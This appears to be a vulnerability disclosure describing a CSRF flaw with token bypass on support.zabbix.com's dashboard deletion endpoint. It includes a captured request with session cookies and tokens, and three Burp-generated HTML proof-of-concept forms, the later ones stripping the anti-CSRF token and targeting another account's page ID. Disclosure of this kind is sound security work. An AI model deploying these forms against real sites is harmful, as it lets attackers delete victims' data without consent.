Trivial CSRF
The web application does not, or can not, sufficiently verify whether a well-formed, valid, consistent request was intentionally provided by the user who submitted the request.
-
- Steps To Reproduce:
Create two test accounts.
1. Go to the dashboard page and click on create a dashboard button by filling the name for dashboard.
2.Do the same for the second account.
3. After creating the dashboard go to manage dashboard.click on the settings icon of the dashboard and click delete.
4.You will have to capture the request in my case i am using burpsuite tool.
5.Capture the delete request which will be as
GET /secure/DeletePortalPage!default.jspa?pageId=21293&atl_token=AMYF-O4GS-WBQS- UFB5_7cbfc4842048c480eac757b5d6567af5c0596931_lin&inline=true&decorator=dialog&_=1677646740700 HTTP/1.1
Host: support.zabbix.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: /
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://support.zabbix.com/secure/ConfigurePortalPages.jspa?view=favourites
X-AUSERNAME: hack
X-Requested-With: XMLHttpRequest
Connection: close
Cookie: zabbix_language=en; zbcfipc=IN; _ga_1F6WJN99ZG=GS1.1.1677644608.2.1.1677646741.0.0.0; _ga=GA1.1.1955293434.1677615394; _gid=GA1.2.1886669809.1677615395; ln_or=eyI2MzU2MjUiOiJkIn0%3D; atlassian.xsrf.token=AMYF-O4GS-WBQS-UFB5_7cbfc4842048c480eac757b5d6567af5c0596931_lin; JSESSIONID=CDC451C048B55E9BBC08847BA705066C; seraph.rememberme.cookie=104436%3Ad9035c0e7b8d0c250e8c063d05dc1620bff8050f
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
6.Now go to engagement tools in Burpsuite and click on generate a csrf poc for this request.The generated csrf poc will look like
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://support.zabbix.com/secure/DeletePortalPage!default.jspa">
<input type="hidden" name="pageId" value="21293" />
<input type="hidden" name="atl_token" value="AMYF-O4GS-WBQS-UFB5_ 7cbfc4842048c480eac757b5d6567af5c0596931_lin" />
<input type="hidden" name="inline" value="true" />
<input type="hidden" name="decorator" value="dialog" />
<input type="hidden" name="_" value="1677645852918" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
7.As you can see there is a token parameter which we will bypass.Just remove the token paramater and the request will be as
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://support.zabbix.com/secure/DeletePortalPage!default.jspa">
<input type="hidden" name="pageId" value="21293" />
<input type="hidden" name="inline" value="true" />
<input type="hidden" name="decorator" value="dialog" />
<input type="hidden" name="_" value="1677645852918" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
8.Save the csrf poc with .html extension.
9.Now the best part the token is bypassed and now to delete the dashboard of second account just change the pageid value to the value of other account i.e 21295
(NOTE:This page id is the id of my second account)
10.Altered request
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://support.zabbix.com/secure/DeletePortalPage!default.jspa">
<input type="hidden" name="pageId" value="21295" />
<input type="hidden" name="inline" value="true" />
<input type="hidden" name="decorator" value="dialog" />
<input type="hidden" name="_" value="1677645852918" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
11.Just open the csrf poc and submit the request.The token is bypassed and the dashboard will be deleted of the victims account
